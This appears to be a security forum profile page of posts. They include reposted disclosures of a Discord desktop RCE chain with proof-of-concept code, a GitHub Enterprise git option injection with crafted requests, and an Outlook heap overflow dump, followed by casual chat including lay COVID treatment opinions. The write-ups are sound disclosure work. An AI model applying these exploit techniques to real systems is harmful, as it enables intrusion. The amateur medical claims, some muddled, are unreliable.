Nytro
Administrators
Posts: 18753
Days Won: 726

Everything posted by Nytro

  1. CVE-2020-16898
     PoC BSOD for CVE-2020-16898 (badneighbor)
     Tested against Windows 10 version 2004
     Source: https://github.com/0xeb-bp/cve-2020-16898
  2. MKSB(en) Masato Kinugawa's Security Blog / @kinugawamasato
     Saturday, October 17, 2020

     Discord Desktop app RCE

     A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Program. The RCE I found was an interesting one because it is achieved by combining multiple bugs. In this article, I'd like to share the details.

     Why I chose Discord for the target

     I kind of felt like finding vulnerabilities in an Electron app, so I was looking for a bug bounty program which pays a bounty for an Electron app and I found Discord. Also, I am a Discord user and simply wanted to check if the app I'm using is secure, so I decided to investigate.

     Bugs I found

     Basically I found the following three bugs and achieved RCE by combining them.

     • Missing contextIsolation
     • XSS in iframe embeds
     • Navigation restriction bypass (CVE-2020-15174)

     I'll explain these bugs one by one.

     Missing contextIsolation

     When I test an Electron app, I always first check the options of the BrowserWindow API, which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible. Discord's Electron app is not an open source project, but the Electron JavaScript code is saved locally in the asar format and I was able to read it just by extracting it.

     In the main window, the following options are used:

         const mainWindowOptions = {
           title: 'Discord',
           backgroundColor: getBackgroundColor(),
           width: DEFAULT_WIDTH,
           height: DEFAULT_HEIGHT,
           minWidth: MIN_WIDTH,
           minHeight: MIN_HEIGHT,
           transparent: false,
           frame: false,
           resizable: true,
           show: isVisible,
           webPreferences: {
             blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
             nodeIntegration: false,
             preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
             nativeWindowOpen: true,
             enableRemoteModule: false,
             spellcheck: true
           }
         };

     The important options which we should check here are especially nodeIntegration and contextIsolation. From the above code, I found that the nodeIntegration option is set to false and the contextIsolation option is set to false (the default of the used version) in Discord's main window. If nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling require(). For example, the way to execute the calc application on Windows is:

         <script>
           require('child_process').exec('calc');
         </script>

     This time, nodeIntegration was set to false, so I couldn't use Node.js features by calling require() directly. However, there is still a possibility of access to Node.js features. contextIsolation, another important option, was set to false. This option should not be set to false if you want to eliminate the possibility of RCE in your app. If contextIsolation is disabled, a web page's JavaScript can affect the execution of Electron's internal JavaScript code on the renderer, and preload scripts (in the following, this JavaScript will be referred to as the JavaScript code outside web pages). For example, if you override Array.prototype.join, one of the JavaScript built-in methods, with another function from a web page's JavaScript, the JavaScript code outside web pages will also use the overridden function when join is called.

     This behavior is dangerous because Electron allows the JavaScript code outside web pages to use Node.js features regardless of the nodeIntegration option, and by interfering with them from the function overridden in the web page, it could be possible to achieve RCE even if nodeIntegration is set to false. By the way, such a trick was previously not known. It was first discovered in a pentest by Cure53, which I also joined, in 2016. After that, we reported it to the Electron team and contextIsolation was introduced. Recently, that pentest report was published. If you are interested, you can read it from the following link:

     Pentest-Report Ethereum Mist 11.2016 - 10.2017
     https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view

     You can also read the slides which I used at a CureCon event:

     contextIsolation introduces separated contexts between the web page and the JavaScript code outside web pages, so that the JavaScript execution of each does not affect the other. This is a necessary feature to eliminate the possibility of RCE, but this time it was disabled in Discord.

     Now I found that contextIsolation is disabled, so I started looking for a place where I could execute arbitrary code by interfering with the JavaScript code outside web pages. Usually, when I create a PoC for RCE in Electron pentests, I first try to achieve RCE by using Electron's internal JavaScript code on the renderer. This is because Electron's internal JavaScript code on the renderer can be executed in any Electron app, so basically I can reuse the same code to achieve RCE and it's easy. In my slides, I introduced that RCE can be achieved by using the code which Electron executes at navigation time. It's not only possible from that code, but there is such code in some places. (I'd like to publish examples of the PoC in the future.)

     However, depending on the version of Electron used, or the BrowserWindow options which are set, because the code has been changed or the affected code can't be reached correctly, sometimes the PoC via Electron's code does not work well. This time, it did not work, so I decided to change the target to the preload scripts. When checking the preload scripts, I found that Discord exposes a function, which allows some allowed modules to be called via DiscordNative.nativeModules.requireModule('MODULE-NAME'), into the web page. Here, I couldn't use modules that can be used for RCE directly, such as the child_process module, but I found code where RCE can be achieved by overriding the JavaScript built-in methods and interfering with the execution of the exposed module.

     The following is the PoC. I was able to confirm that the calc application pops up when I call the getGPUDriverVersions function, which is defined in the module called "discord_utils", from devTools, while overriding RegExp.prototype.test and Array.prototype.join.

         RegExp.prototype.test = function () {
           return false;
         }
         Array.prototype.join = function () {
           return "calc";
         }
         DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();

     The getGPUDriverVersions function tries to execute the program by using the "execa" library, like the following:

         module.exports.getGPUDriverVersions = async () => {
           if (process.platform !== 'win32') {
             return {};
           }

           const result = {};
           const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
           try {
             result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
           } catch (e) {
             result.nvidia = {error: e.toString()};
           }

           return result;
         };

     Usually execa tries to execute "nvidia-smi.exe", which is specified in the nvidiaSmiPath variable; however, due to the overridden RegExp.prototype.test and Array.prototype.join, the argument is replaced with "calc" in execa's internal processing. Specifically, the argument is replaced by changing the following two parts.

     https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36
     https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55

     The remaining work is to find a way to execute JavaScript on the application. If I can find it, it leads to actual RCE.

     XSS in iframe embeds

     As explained above, I found that RCE could happen from arbitrary JavaScript execution, so I was trying to find an XSS vulnerability. The app supports the autolink and Markdown features, but they looked good. So I turned my attention to the iframe embeds feature. The iframe embeds feature is the feature which automatically displays the video player on the chat when a YouTube URL is posted, for example. When the URL is posted, Discord tries to get the OGP information of that URL and, if there is OGP information, it displays the page's title, description, thumbnail image, associated video and so on in the chat. Discord extracts the video URL from the OGP and, only if the video URL is an allowed domain and the URL actually has the URL format of the embeds page, the URL is embedded in the iframe.

     I couldn't find documentation about which services can be embedded in the iframe, so I tried to get a hint by checking the CSP's frame-src directive. At that time, the following CSP was used:

         Content-Security-Policy: [...] ; frame-src https://*.youtube.com https://*.twitch.tv https://open.spotify.com https://w.soundcloud.com https://sketchfab.com https://player.vimeo.com https://www.funimation.com https://twitter.com https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://js.stripe.com https://assets.braintreegateway.com https://checkout.paypal.com https://*.watchanimeattheoffice.com

     Obviously, some of them are listed to allow iframe embeds (e.g. YouTube, Twitch, Spotify).

     I tried to check if the URL can be embedded in the iframe by specifying the domains in the OGP information one by one, and tried to find XSS on the embedded domains. After some attempts, I found that sketchfab.com, which is one of the domains listed in the CSP, can be embedded in the iframe and found XSS on the embeds page. I didn't know about Sketchfab at that time, but it seems that it is a platform on which users can publish, buy and sell 3D models. There was a simple DOM-based XSS in the footnote of the 3D model. The following is the PoC, which has the crafted OGP. When I posted this URL to the chat, Sketchfab was embedded in the iframe on the chat, and after a few clicks on the iframe, arbitrary JavaScript was executed.

     https://l0.cm/discord_rce_og.html

         <head>
           <meta charset="utf-8">
           <meta property="og:title" content="RCE DEMO">
           [...]
           <meta property="og:video:url" content="https://sketchfab.com/models/2b198209466d43328169d2d14a4392bb/embed">
           <meta property="og:video:type" content="text/html">
           <meta property="og:video:width" content="1280">
           <meta property="og:video:height" content="720">
         </head>

     Okay, finally I found an XSS, but the JavaScript is still executed in the iframe. Since Electron doesn't load the "JavaScript code outside web pages" into the iframe, even if I override the JavaScript built-in methods in the iframe, I can't interfere with Node.js' critical parts. To achieve RCE, we need to get out of the iframe and execute JavaScript in a top-level browsing context. This requires opening a new window from the iframe or navigating the top window to another URL from the iframe.

     I checked the related code and I found the code to restrict navigations by using the "new-window" and "will-navigate" events in the code of the main process:

         mainWindow.webContents.on('new-window', (e, windowURL, frameName, disposition, options) => {
           e.preventDefault();
           if (frameName.startsWith(DISCORD_NAMESPACE) && windowURL.startsWith(WEBAPP_ENDPOINT)) {
             popoutWindows.openOrFocusWindow(e, windowURL, frameName, options);
           } else {
             _electron.shell.openExternal(windowURL);
           }
         });
         [...]
         mainWindow.webContents.on('will-navigate', (evt, url) => {
           if (!insideAuthFlow && !url.startsWith(WEBAPP_ENDPOINT)) {
             evt.preventDefault();
           }
         });

     I thought this code could correctly prevent users from opening a new window or navigating the top window. However, I noticed unexpected behavior.

     Navigation restriction bypass (CVE-2020-15174)

     I thought the code was okay, but I tried to check that the top navigation from the iframe is blocked anyway. Then, surprisingly, the navigation was not blocked for some reason. I expected that the attempt is caught by the "will-navigate" event before the navigation happens and refused by preventDefault(), but it is not. To test this behavior, I created a small Electron app. And I found that the "will-navigate" event is not emitted from the top navigation started from an iframe for some reason. To be exact, if the top's origin and the iframe's origin are the same origin, the event is emitted, but if they are different origins, the event is not emitted. I didn't think that there is a legitimate reason for this behavior, so I thought this is an Electron bug and decided to report it to the Electron team later.

     With the help of this bug, I was able to bypass the navigation restriction. The last thing I should do is just a navigation to the page which contains the RCE code by using the iframe's XSS, like top.location="//l0.cm/discord_calc.html". In this way, by combining the three bugs, I was able to achieve RCE as shown in the video below.

     In the end

     These issues were reported through Discord's Bug Bounty Program. First, the Discord team disabled the Sketchfab embeds, and a workaround was taken to prevent navigation from the iframe by adding the sandbox attribute to the iframe. After a while, contextIsolation was enabled. Now even if I could execute arbitrary JavaScript on the app, RCE does not occur via the overridden JavaScript built-in methods. I received $5,000 as a reward for this discovery.

     The XSS on Sketchfab was reported through Sketchfab's Bug Bounty Program and fixed by Sketchfab developers quickly. I received $300 as a reward for this discovery.

     The bug in the "will-navigate" event was reported as a bug of Electron to Electron's security team, and it was fixed as the following vulnerability (CVE-2020-15174).

     Unpreventable top-level navigation · Advisory · electron/electron
     https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674

     That's it. Personally, I like that an external page's bug or Electron's bug, which is unrelated to the app's own implementation, led to RCE. I hope this article helps you keep your Electron apps secure. Thanks for reading!

     Posted by Masato Kinugawa
     Source: https://mksben.l0.cm/2020/10/discord-desktop-rce.html
  3. GitHub - RCE via git option injection (almost) - $20,000 Bounty
     Oct 18, 2020

     It had been a while since I'd looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it's just to discourage customers from messing around, and if you do a bit of googling there are lots of scripts available to decode it, leaving you with regular ruby files for a rails app.

     The last bug I submitted to GitHub was around a year ago. It was to do with injecting options into the git command using branch names that started with a -, allowing an attacker to truncate files on the server, so I decided that was a good place to start to see if any similar bugs had been introduced.

     Discovery

     I began searching for all the places that the git process was called, then tracing the arguments back to see if they were user controllable and if they were sanitised correctly. Most places either put user controlled data behind -- in the command so that it is never parsed as an option, or there was a check to make sure that it is a valid sha1 or commitish value and doesn't start with a -.

     After a while I came across a method reverse_diff which took two commits and ended up running a git diff-tree with them, and the only check was that they were both valid git references for the repo (sha, branch, tag, etc). Tracing backwards, this function was called by a revert_range method which was used when reverting between two previous wiki commits. So a POST to user/repo/wiki/Home/_revert/57f931f8839c99500c17a148c6aae0ee69ded004/1967827bcd890246b746a5387340356d0ac7710a would end up calling reverse_diff with the values 57f931f8839c99500c17a148c6aae0ee69ded004 and 1967827bcd890246b746a5387340356d0ac7710a. This looked perfect! I checked out a repo and pushed a new branch called --help with git push origin master:--help, then tried to post to user/repo/wiki/Home/_revert/HEAD/--help.

     But instead of success a 422 Unprocessable Entity was returned. Looking at the server logs it was complaining that the CSRF token was invalid. Turns out that rails now has per form CSRF tokens that are generated based on the path that you are posting to. Query parameters aren't checked, but in this case the route was set up to only allow path params for the commits. The form for the revert along with the valid token was generated by the wiki compare template, but unfortunately that had a much stricter validation and required the commits to be valid sha hashes. This meant that I couldn't get it to render a valid form and token for the --help branch, only for valid commit shas.

     Digging into the valid_authenticity_token? method in rails, another way to bypass the per form CSRF is by using the global token, as there is a code path to make existing forms backwards compatible while transitioning.

         def valid_authenticity_token?(session, encoded_masked_token) # :doc:
           if encoded_masked_token.nil? || encoded_masked_token.empty? ||
               !encoded_masked_token.is_a?(String)
             return false
           end

           begin
             masked_token = Base64.strict_decode64(encoded_masked_token)
           rescue ArgumentError # encoded_masked_token is invalid Base64
             return false
           end

           # See if it's actually a masked token or not. In order to
           # deploy this code, we should be able to handle any unmasked
           # tokens that we've issued without error.

           if masked_token.length == AUTHENTICITY_TOKEN_LENGTH
             # This is actually an unmasked token. This is expected if
             # you have just upgraded to masked tokens, but should stop
             # happening shortly after installing this gem.
             compare_with_real_token masked_token, session

           elsif masked_token.length == AUTHENTICITY_TOKEN_LENGTH * 2
             csrf_token = unmask_token(masked_token)
             compare_with_real_token(csrf_token, session) ||
               valid_per_form_csrf_token?(csrf_token, session)
           else
             false # Token is malformed.
           end
         end

     The global CSRF token is quite often handed out to the client using the csrf_meta_tags helper, but GitHub had really locked down everything and after a lot of searching there was no place that I could find that was leaking it. GitHub had even gone so far as raising an error if the per form CSRF was not set up correctly, as that could leak the global token. I spent quite a bit of time searching for a way to bypass this; the way the token was generated by rails, it didn't really matter where the form was created so long as I could get it to use a path such as wiki/Home/_revert/HEAD/--help. After a lot of searching and digging very deep within both GHE and rails code I came up empty handed. I did find a few archived html pages on github.com indicating that the global token used to be handed out, just not any more. GitHub stores the global CSRF token for a user session in the database, so I decided to just grab it from there, continue on, and come back to how to find it later.

     Exploit

     I installed and ran execsnoop from perf-tools on the GHE server to have a closer look at the exact git command that was run when doing a revert and saw that it was in the form git diff-tree -p -R commit1 commit2 -- Home.md. The diff-tree git command has an option --output allowing you to write the output to a file instead of outputting the results, so using HEAD as the first commit and --output=/tmp/ggg as the second would write the latest diff of a file to /tmp/ggg. So I pushed a new branch called --output=/tmp/ggg to the wiki repo, then did a POST to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Ftmp%2Fggg using the authenticity_token I'd grabbed from the database. Looking on the server the file /tmp/ggg had been created with the output of the diff!

         9ea5ef1f10e9ff1974055d3e4a60bec143822f9d
         diff --git b/Home.md a/Home.md
         index c3a38e1..85402bc 100644
         --- b/Home.md
         +++ a/Home.md
         @@ -1,4 +1,3 @@
          Welcome to the public wiki!
         -3
         +2

     The next thing to do was to work out what to do with it. The file could be written anywhere the git user had access to, and the content at the end of the file was fairly controllable. After a lot more searching I found a few writeable env.d directories (such as /data/github/shared/env.d) which contained some setup scripts. The files in these directories ended up being sourced when the services started up or when some commands were run:

         for i in $envdir/*.sh; do
           if [ -r $i ]; then
             . $i
           fi
         done

     Since doing a . script.sh doesn't require the file to be executable, and bash will continue running a script after it encounters errors, this meant that if the diff that was written contained some valid shell script then it would be executed! So now I had everything (kind of) that was required to exploit the bug.

     • Grab a user's CSRF token from the database
     • Create a wiki page containing ; echo vakzz was here > /tmp/ggg
     • Edit the wiki page and add a new line of text: # anything
     • Clone the wiki repo
     • Push a new branch name with our injected flag: git push origin master:--output=/data/failbotd/shared/env.d/00-run.sh
     • Use burp or curl to post to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh using the authenticity_token from the database

         POST /user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh HTTP/1.1
         Content-Type: application/x-www-form-urlencoded
         Cookie: user_session=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         Content-Length: 65

         authenticity_token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3d

     • Check the server to see that the file has been created with our diff:

         $ cat /data/failbotd/shared/env.d/00-run.sh
         69eb12b5e9969ec73a9e01a67555c089bcf0fc36
         diff --git b/Home.md a/Home.md
         index 4a7b77c..ce38b05 100644
         --- b/Home.md
         +++ a/Home.md
         @@ -1,2 +1 @@
         -; echo vakzz was here > /tmp/ggg`
         -# anything
         \ No newline at end of file
         +; echo vakzz was here > /tmp/ggg`
         \ No newline at end of file

     • Run the file that sources our diff and check it worked

         ./production.sh
         ./production.sh: 1: /data/failbotd/current/.app-config/env.d/00-run.sh: 69eb12b5e9969ec73a9e01a67555c089bcf0fc36: not found
         diff: unrecognized option '--git'
         diff: Try 'diff --help' for more information.
         ./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: index: not found
         ./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: ---: not found
         ./production.sh: 5: /data/failbotd/current/.app-config/env.d/00-run.sh: +++: not found
         ./production.sh: 6: /data/failbotd/current/.app-config/env.d/00-run.sh: @@: not found
         ./production.sh: 7: /data/failbotd/current/.app-config/env.d/00-run.sh: -: not found
         ./production.sh: 2: /data/failbotd/current/.app-config/env.d/00-run.sh: -#: not found
         ./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found
         ./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: +: not found
         ./production.sh: 11: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found

         $ cat /tmp/ggg
         vakzz was here

     At this stage I decided to report the issue to GitHub, even though I had no way to bypass the per form CSRF token. The underlying issue was still pretty critical, and it's possible that GitHub could release a patch in the future that accidentally leaked the global token or change the route to accept query parameters, which would open them up to being vulnerable. Within 15 minutes GitHub had triaged the bug and let me know that they were looking into it. A few hours later they responded again confirming the underlying issue and that they could not find a way to bypass the per form token, mentioning that it was a severe issue and that they may have just been lucky with their CSRF setup.

     I sent through a summary of the methods I'd tried for bypassing the per form token as well as potential spots where it might be possible to leak it, and confirmed that I thought it was pretty unlikely to be exploitable. So the bug itself was critical, but without it being exploitable I really had no idea how GitHub was going to land when deciding a bounty, or even if there would be a bounty at all. I ended up being very pleasantly surprised.

     Timeline

     • July 25, 2020 01:48:02 AEST - Bug submitted via HackerOne
     • July 25, 2020 02:05:21 AEST - Bug was triaged by GitHub
     • July 25, 2020 09:18:28 AEST - Underlying issue was confirmed
     • August 11, 2020 - GitHub Enterprise 2.21.4 released fixing the issue

         High: An attacker could inject a malicious argument into a Git sub-command when executed on GitHub Enterprise Server. This could allow an attacker to overwrite arbitrary files with partially user-controlled content and potentially execute arbitrary commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to access repositories within the GHES instance. However, due to other protections in place, we could not identify a way to actively exploit this vulnerability. This vulnerability was reported through the GitHub Security Bug Bounty program.

     • September 11, 2020 02:52:15 AEST - $20,000 bounty awarded

     Source: https://devcraft.io/2020/10/18/github-rce-git-inject.html
  4. CVE-2020-16947

     This vulnerability occurs in Outlook 2019 (16.0.13231.20262) installed on Windows 10 1909 x64.

     TLDR; I found this bug using the winafl fuzzer. This bug occurred when parsing html contents. If an attacker successfully executes this exploit, it can lead to remote command execution.

     Details

         0:000> r
         rax=0000000000000000 rbx=0000021c99ce9eb0 rcx=0000021c99ce9eb0
         rdx=00000046c07f8a30 rsi=0000021cc85ac000 rdi=00000000ffffe000
         rip=00007ffe69012f5b rsp=00000046c07f89f0 rbp=00000046c07f8a69
          r8=00000046c07f8a28  r9=0000000000000041 r10=00007de1cf5e3124
         r11=0000000000000000 r12=00000046c07f8b00 r13=0000021c99ce9f1c
         r14=0000000000000041 r15=00000000000003b5
         iopl=0         nv up ei pl zr na po nc
         cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
         OLMAPI32!HrGetMessageClassFromContentClassW+0xf80b:
         00007ffe`69012f5b 448836          mov     byte ptr [rsi],r14b ds:0000021c`c85ac000=??
         0:000> d rsi - 10
         0000021c`c85abff0  ff fd ff fd ff fd ff fd-ff fd ff fd ff fd ff 41  ...............A
         0000021c`c85ac000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0000021c`c85ac010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0000021c`c85ac020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0000021c`c85ac030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0000021c`c85ac040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0000021c`c85ac050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0000021c`c85ac060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
         0:000> !heap -p -a rsi
             address 0000021cc85ac000 found in
             _DPH_HEAP_ROOT @ 21ce0331000
             in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                          21ccb3eb000:      21cc85a7ff0             4010 -      21cc85a7000             6000
             00007ffea238825b ntdll!RtlDebugAllocateHeap+0x000000000000003b
             00007ffea22a9745 ntdll!RtlpAllocateHeap+0x00000000000000f5
             00007ffea22a73d4 ntdll!RtlpAllocateHeapInternal+0x00000000000006d4
             00007ffe68c8777d OLMAPI32!MAPIAllocateBuffer+0x00000000000000cd
             00007ffe69012a35 OLMAPI32!HrGetMessageClassFromContentClassW+0x000000000000f2e5
             00007ffe69015d34 OLMAPI32!HrTextFromCompressedRTFStreamEx+0x00000000000023d4
             00007ffe68dcc776 OLMAPI32!RTFSyncCpid+0x0000000000000156
             00007ffe7c3eb532 exsec32!HrExsec32Initialize+0x0000000000005372
             00007ffe7c3e5631 exsec32+0x0000000000005631
             00007ffe68dccc76 OLMAPI32!RTFSyncCpid+0x0000000000000656
             00007ffe68de2ab4 OLMAPI32!HrCreateMHTMLConverter+0x0000000000002634
             00007ffe68dd21a7 OLMAPI32!MlangIsConvertible+0x0000000000004a07
             00007ffe68de299d OLMAPI32!HrCreateMHTMLConverter+0x000000000000251d
             00007ffe7c42748f exsec32!DllUnregisterServer+0x00000000000002bf
             00007ffe7c3eb418 exsec32!HrExsec32Initialize+0x0000000000005258
             00007ffe7c3e5631 exsec32+0x0000000000005631
             00007ffe551703d9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025539
             00007ffe551709f9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025b59
             00007ffe55174dec OUTLMIME!MimeOleInetDateToFileTime+0x0000000000029f4c
             00007ffe55175279 OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a3d9
             00007ffe55174ebe OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a01e
             00007ffe7c41a8fc exsec32!HrMaxAlgStrength+0x0000000000004cac
             00007ffe7c3eb017 exsec32!HrExsec32Initialize+0x0000000000004e57
             00007ffe7c3ebf23 exsec32!HrExsec32Initialize+0x0000000000005d63
             00007ffe49ac9f47 mso98win32client!Ordinal3621+0x00000000000000e7
             00007ffe49ac9ecd mso98win32client!Ordinal3621+0x000000000000006d
             00007ff7afc43f79 outlook!FEnableAMapProgress+0x000000000002f099
             00007ff7afdb638d outlook!UpdateSharingAccounts+0x000000000007031d
             00007ff7afdc3d85 outlook!IsOutlookOutsideWinMain+0x0000000000003af5
             00007ff7afcf7727 outlook!HrGetDelegatorInfoSync+0x00000000000016e7
             00007ff7afd2a2b0 outlook!GetOutlookSafeModeState+0x000000000000bd00
             00007ff7afd2a14b outlook!GetOutlookSafeModeState+0x000000000000bb9b

     When copying strings outside the ASCII range from html contents, the corresponding string is replaced with 0xfffd. As a result, the size of the copied string doubles, so despite the src buffer and dst buffer being the same size, a buffer overflow occurs.

     Source: https://github.com/0neb1n/CVE-2020-16947
  5. Yes, it would be much more practical, but most of the time it is not enabled.
  6. Hi, you can find more articles in the forum category dedicated to this subject: https://rstforums.com/forum/forum/30-wireless-pentesting/page/5/ And there are many other resources available on Google/YouTube (search for "WiFi WPA2 crack"; most likely it is not WEP over there). The problem would be which network card you have, whether you can use it for something like this. Try a few tutorials and see if it works.
  7. There aren't really any others; in principle, any cross-platform compiler can compile C/C++ for another operating system with the appropriate parameters. You can even use Visual Studio for this: https://devblogs.microsoft.com/cppblog/linux-development-with-c-in-visual-studio/ And with WSL (Windows Subsystem for Linux) you can even test the binaries more easily.
  8. MinGW?
  9. I have a cousin who used to bet (or still bets) on football. But he plays football, he played in the third league, and besides that he watches matches. Lots of matches. Meaning he knows if a team is missing a player, how they played in their last matches, and loads of things like that. And he wins, but he doesn't put in much money, so he hasn't made a fortune. There's no way to do it unless matches are fixed and you know about it. It's a public story: someone who didn't reveal their identity worked as who knows what at a football team. And someone there at the team would have him place bets for them, fairly large sums. He saw that this person won, once, twice, and decided to bet exactly what that person bet. He made a lot of money. Matches were being fixed and sometimes even the exact score was known in advance. My suggestion is not to bother with this kind of thing, because it isn't worth it, at all.
  10. There are 2 weeks left for the CFP (the presentation proposals); who else is interested?
  11. Probably because they are not actual treatments; they can only help somehow. Zinc helps the immune system, and azithromycin is an antibiotic that normally isn't necessary, because antibiotics have no effect on viruses, only on bacteria. It is of course useful in situations where a (bacterial) infection appears in the lungs and the respiratory system in general, because that can happen in a Covid infection.
  12. I started reading that Covid book. It's really good, it covers a huge number of things, both from a medical point of view and related to managing the epidemic, things related to politics, religion and even the psychology of the population. I think it covers pretty much everything there is. From a medical point of view, what is explained there isn't that easy to understand. I picked up a few ideas myself. 1. The SARS-CoV-2 virus is made of RNA, the spike protein and the glycoprotein 2. The virus "binds" to the cells it infects through the glycoproteins (which give it the crown shape and the name coronavirus) 3. These glycoproteins bind to cells that have ACE2 receptors on their surface (not all of them do, only some, and it's important to keep this in mind) 4. Unlike SARS-CoV (i.e. the SARS from 2002) and MERS (from 2012), the bond is stronger and that's why it is more contagious 5. The probable cause of the pneumonias is that "cytokine storm" you've all heard about. When a cell is infected by a virus, it releases cytokine. This triggers the immune system's intervention, the result being the attack on the alveoli in the lungs that allow us to breathe 6. It seems it also infects some cells in the blood (endothelial) and that this favours the formation of blood clots (through coagulation), but honestly there are a lot of medical terms and I didn't understand exactly 7. Headaches and muscle pain appear because there are cells there with ACE2 receptors the virus can attach to 8. Anosmia (loss of taste) and ageusia (loss of smell) are the most common conditions of the central peripheral nervous system 9. Loss of taste and smell generally appear in patients who would generally have milder symptoms (i.e. that's a good thing) 10. People carrying the virus are able to spread it! 11. The olfactory nerves and the olfactory tract have ACE2 receptors, and that's probably why these symptoms exist 12. The vascular and arterial cells in the brain have ACE2 receptors, and that's why there is an increased risk of stroke. I'm thinking obesity is also a problem, because of the narrowing of blood vessels (due to fat) and the problems Covid causes: infection of vascular cells and blood clotting + obesity = bad news. As for treatment, there are some solutions but they aren't found in pharmacies. It doesn't say anything about Remdesivir, but melatonin seems like it can help, and also (from other sources, such as Trump's treatment) vitamin D and zinc (very good for the immune system) would be useful. Of course, there are other solutions like dexamethasone for patients in serious condition, or others, but they're injectable and aren't given without a prescription, and nobody should treat themselves. Chloroquine hasn't been shown to help with anything. Convalescent plasma, i.e. plasma from the blood of those who have antibodies, is probably a very good solution. If only those idiots who think it takes away their immunity would donate... Other specific problems can be solved with specific drugs, such as an immune system overreaction with drugs that inhibit the immune system's action. That's about it from a medical point of view. That's what I understood; it's possible I didn't understand everything properly, especially since the terminology is quite complicated. I'll keep reading and come back with interesting things. I really recommend the book! Edit: Not related to Covid, but related to diabetes. A diabetologist live on Digi says diabetes doesn't necessarily come from sugar consumption but rather from stress, lots of work, a sedentary lifestyle, unhealthy food, smoking, alcohol, and that it probably also has a genetic cause (apparently the exact cause of the disease isn't known). And he suggests eating parsley, in general (more vitamin C than lemon and more iron than spinach). Also good are 2 glasses of red wine a day (not 2 bottles on the weekend), because it helps dilate the blood vessels. Chemically, there is a substance in grapes that gives them their red colour and which is activated only in wine, not in plain grapes or in must. And it also helps with good mood (though not much, given the limited quantity).
  13. Yes, it makes no sense for preventing Covid, it only makes sense financially. If 5 people sit at a table, 5 people pay for what they consume. Pupils don't pay anything. It doesn't matter, it helps, whatever it is. Even a scarf (a Dinamo one, obviously), a shawl or a piece of polenta held over your mouth means that when a person talks, particles don't spread, and they don't reach your mouth and nose as easily either. Think about talking to a person who spits when they talk. Is there a difference between talking to that person with a mask and without a mask? I say there is. Medical masks are necessary when it comes to an enclosed space, but in any case they have to be worn properly. If you look at doctors, you'll see that they don't just put the masks on and that's it, they "seal" them with insulating tape or whatever, so there are no gaps around the edges. That's necessary when dozens of people confirmed positive come around you. If you have long hair and put it in your mouth, or if you often run your hands through your hair and then bring them to your eyes/nose/mouth, yes, it makes sense. It sits on clothes and on everything else just the same. That's why they keep insisting on hand washing: you don't put your clothes and hair in your mouth, but your hands, yes. In any case you can't prevent this 100%; I see myself putting my hands who knows where and then putting a cigarette in my mouth. I accept this risk, I'm aware it's not ok, but I also wash my hands as often as I can. As far as I knew, they're non-refundable. But even if they were, they're still necessary. You have no money but absolutely need something? You borrow. Damn it, I'm sick of loans just for pension increases or whatever; from my point of view this is a serious reason for loans and investments in the healthcare system. I don't think a normative act was necessary, they declared a state of emergency. There was no need for a normative act saying it's an epidemic or a pandemic. If a war started, what would they do? If there were a big earthquake? If a hurricane came (a real one, not Tzanca Uraganul). Yes, it's extremely damaging to the economy, but human lives are more important. I wouldn't stress that badly about people I don't know either, but I do stress when I think that my relatives could be on that list too. As above, you touch money to pay for something, but I don't think anyone is going to start caressing the plexiglass. Well, there are also kids now who might lick it, and who chew second-hand gum; you can't prevent everything. Everyone and every economy is affected, the whole planet. I'm not exactly an expert in economics, but even I know that if someone starts printing money, its value drops because "inflation".
